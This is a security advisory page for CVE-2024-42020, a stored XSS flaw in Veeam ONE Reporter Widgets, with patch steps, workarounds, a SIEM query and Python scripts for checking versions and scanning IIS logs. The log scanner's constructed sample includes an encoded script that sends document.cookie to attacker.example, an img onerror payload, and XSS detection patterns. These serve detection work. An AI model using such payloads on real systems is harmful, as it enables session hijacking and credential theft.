CVE-2024-42020

5.4 MEDIUM

📋 TL;DR

A cross-site scripting (XSS) vulnerability in the Reporter Widgets feature of Veeam ONE lets an attacker inject malicious HTML, and therefore script, into widget content. The injected content runs in the browser of any Veeam ONE user who views the affected widget, which can lead to session hijacking or credential theft.

💻 Affected Systems

Products:
  • Veeam ONE
Versions: prior to 12.1.2.172
Operating Systems: Windows Server
Default Config Vulnerable: ⚠️ Yes
Notes: Affects Reporter Widgets functionality within Veeam ONE web interface.

📦 What is this software?

Veeam ONE is Veeam's monitoring, reporting and capacity-planning product for Veeam Backup & Replication and the virtual and physical infrastructure it protects. Its web-based Reporter component builds dashboards out of widgets; the vulnerable code is the widget rendering in that web interface.

⚠️ Risk & Real-World Impact

🔴 Worst Case

Attackers could steal administrator credentials, hijack sessions, and gain full control over the Veeam ONE environment, potentially compromising backup infrastructure.

🟠 Likely Case

Attackers inject malicious scripts to steal session cookies or credentials from authenticated users, leading to unauthorized access to Veeam ONE.

🟢 If Mitigated

With proper input validation and output encoding, malicious scripts are neutralized, preventing successful exploitation.

🌐 Internet-Facing: MEDIUM
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires an authenticated Veeam ONE account with the ability to create or edit Reporter Widget content. The payload then runs in the browser of any other user, including administrators, who views that widget, so the attacker also depends on a victim opening the affected dashboard.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 12.1.2.172

Vendor Advisory: https://www.veeam.com/kb4649

Restart Required: Yes

Instructions:

1. Download Veeam ONE 12.1.2.172 from the Veeam website.
2. Run the installer on the Veeam ONE server.
3. Follow the upgrade wizard.
4. Restart the Veeam ONE services after installation.

🔧 Temporary Workarounds

Input Validation Enhancement (all)

Where a reverse proxy or WAF sits in front of the Veeam ONE web interface, reject or strip HTML tags and event-handler attributes in widget parameters. This only filters traffic on the way in; it does not change how Veeam ONE itself renders widget content, so it is a stopgap, not a fix.

Content Security Policy (all)

Set a strict Content-Security-Policy header (for example, no inline scripts and script-src limited to the Veeam ONE origin) on responses from the Veeam ONE web interface. Test this on a non-production instance first: a strict policy can break the web UI's own inline scripts, and it limits what injected script can do rather than removing the injection flaw.

🧯 If You Can't Patch

  • Restrict access to the Veeam ONE web interface to trusted networks only, and limit which accounts can create or edit Reporter Widgets.
  • Implement web application firewall (WAF) rules to detect and block XSS payloads, keeping in mind that encoding and case variations can bypass simple signature rules.

🔍 How to Verify

Check if Vulnerable:

Check Veeam ONE version via web interface: Help > About. If version is below 12.1.2.172, system is vulnerable.

Check Version:

Not applicable - check via web interface or Windows Programs and Features

Verify Fix Applied:

After patching, verify version shows 12.1.2.172 or higher in Help > About menu.
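The version check above is easy to get wrong when scripted across many servers, because a plain string comparison sorts "12.1.10.x" before "12.1.2.x". The following is an added example, not the page's or Veeam's own code: it parses the version string as displayed in Help > About or Programs and Features and compares it numerically against the fixed build named on this page. The inventory values are constructed, not real hosts.

```python
"""Added example: decide whether a reported Veeam ONE build is below the
fixed build 12.1.2.172 stated on this page.

Assumption (mine, not from the vendor advisory): the version string looks
like "12.1.2.172", possibly with surrounding text such as "Veeam ONE 12.1.2.172".
"""
import re

FIXED_BUILD = "12.1.2.172"  # patch version stated on this page


def parse_version(text):
    """Extract the first dotted number from text and return it as a tuple of ints."""
    m = re.search(r"\d+(?:\.\d+)*", text)
    if not m:
        raise ValueError(f"no version number in {text!r}")
    return tuple(int(p) for p in m.group(0).split("."))


def is_vulnerable(version, fixed=FIXED_BUILD):
    """True when version is strictly below the fixed build.

    Tuples are compared component by component (numerically, so 10 > 2), and
    the shorter one is padded with zeros so that "12.1" means "12.1.0.0".
    """
    v, f = parse_version(version), parse_version(fixed)
    n = max(len(v), len(f))
    v += (0,) * (n - len(v))
    f += (0,) * (n - len(f))
    return v < f


def triage(inventory):
    """inventory: {hostname: version string}. Returns hosts still below the fix."""
    return sorted(host for host, ver in inventory.items() if is_vulnerable(ver))


if __name__ == "__main__":
    # Constructed sample inventory (hypothetical hosts and builds).
    sample = {
        "veeamone-01": "12.1.2.172",
        "veeamone-02": "12.1.0.100",
        "veeamone-03": "Veeam ONE 12.1.10.5",
        "veeamone-04": "12.0.1.2591",
    }
    print("still vulnerable:", triage(sample))
```

The third sample host shows why numeric comparison matters: as a string, "12.1.10.5" sorts below "12.1.2.172" and would be flagged, while numerically it is a later build and is not.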

📡 Detection & Monitoring

Log Indicators:

  • Unusual HTML/script content in widget parameter logs
  • Multiple failed widget rendering attempts

Network Indicators:

  • HTTP requests containing suspicious script tags in widget parameters

SIEM Query:

source="veeam_one" AND ("widget" AND ("script" OR "javascript" OR "onerror"))

This query matches only literal keywords. Payloads are commonly URL-encoded (once or twice), HTML-entity-encoded or mixed-case, so decode and normalise request fields before matching, and expect some noise from legitimate widget titles that happen to contain these words.
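As an added example (not from the page or from Veeam), the detection logic below runs over constructed IIS W3C access-log lines for the Veeam ONE web interface. It assumes the UI is served by IIS with W3C logging enabled and that widget-related requests contain "widget" in the URI; the widget paths, hostnames, users and payloads in the sample are invented. Each candidate URI is URL-decoded twice and HTML-unescaped before the indicator patterns are applied, so double-encoded payloads are not missed.

```python
"""Added example: find XSS payloads aimed at Reporter widget endpoints in
IIS W3C access logs.

Assumptions (mine): W3C extended format with a #Fields header; the field
names below are the standard IIS ones. Real Veeam ONE widget URL paths are
not known to this example, so any URI containing "widget" is inspected.
"""
import html
import re
from urllib.parse import unquote_plus

# Indicators a practitioner would treat as XSS in a widget parameter.
XSS_PATTERNS = [
    re.compile(r"<\s*script\b", re.I),
    re.compile(r"javascript\s*:", re.I),
    re.compile(r"\bon(error|load|click|mouse\w+|focus|blur|key\w+|submit|toggle)\s*=", re.I),
    re.compile(r"<\s*(img|svg|iframe|object|embed)\b", re.I),
]


def normalize(s):
    """Undo two layers of URL encoding, then HTML entities."""
    for _ in range(2):
        s = unquote_plus(s)
    return html.unescape(s)


def parse_w3c(lines):
    """Yield one dict per log record, keyed by the names in the #Fields header."""
    fields = None
    for line in lines:
        line = line.rstrip("\r\n")
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split(" ")
        if len(parts) != len(fields):
            continue  # malformed record; skip rather than misalign columns
        yield dict(zip(fields, parts))


def find_xss(lines):
    """Return (client ip, user, decoded uri, matched pattern) for each suspicious widget request."""
    hits = []
    for rec in parse_w3c(lines):
        uri = rec.get("cs-uri-stem", "") + "?" + rec.get("cs-uri-query", "")
        decoded = normalize(uri)
        if "widget" not in decoded.lower():
            continue
        for pat in XSS_PATTERNS:
            if pat.search(decoded):
                hits.append((rec.get("c-ip"), rec.get("cs-username"), decoded, pat.pattern))
                break
    return hits


# Constructed sample log (not a real capture); paths, users and IPs are invented.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2024-09-05 10:00:01 10.0.0.5 GET /reporter/widgets/render id=42&title=Backup+status 443 CORP\\alice 10.0.0.21 Mozilla/5.0 200
2024-09-05 10:00:07 10.0.0.5 POST /reporter/widgets/save id=42&title=%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fattacker.example%2F%3F%27%2Bdocument.cookie%3C%2Fscript%3E 443 CORP\\mallory 10.0.0.99 Mozilla/5.0 200
2024-09-05 10:00:09 10.0.0.5 POST /reporter/widgets/save id=43&title=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E 443 CORP\\mallory 10.0.0.99 Mozilla/5.0 200
2024-09-05 10:00:15 10.0.0.5 GET /reporter/dashboards/list - 443 CORP\\alice 10.0.0.21 Mozilla/5.0 200
"""

if __name__ == "__main__":
    for ip, user, uri, pattern in find_xss(SAMPLE_LOG.splitlines()):
        print(f"{ip} {user} matched {pattern!r}: {uri}")
```

The third sample line is double-encoded (%253C rather than %3C); a single decode would leave it as %3Cimg..., which none of the patterns match, so the second decode pass is what makes that record visible. The event-handler pattern is deliberately a short list of handler names rather than `on\w+=` to avoid flagging ordinary parameters such as `one=1`.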

🔗 References

  • Veeam advisory KB4649: https://www.veeam.com/kb4649
  • NVD entry: https://nvd.nist.gov/vuln/detail/CVE-2024-42020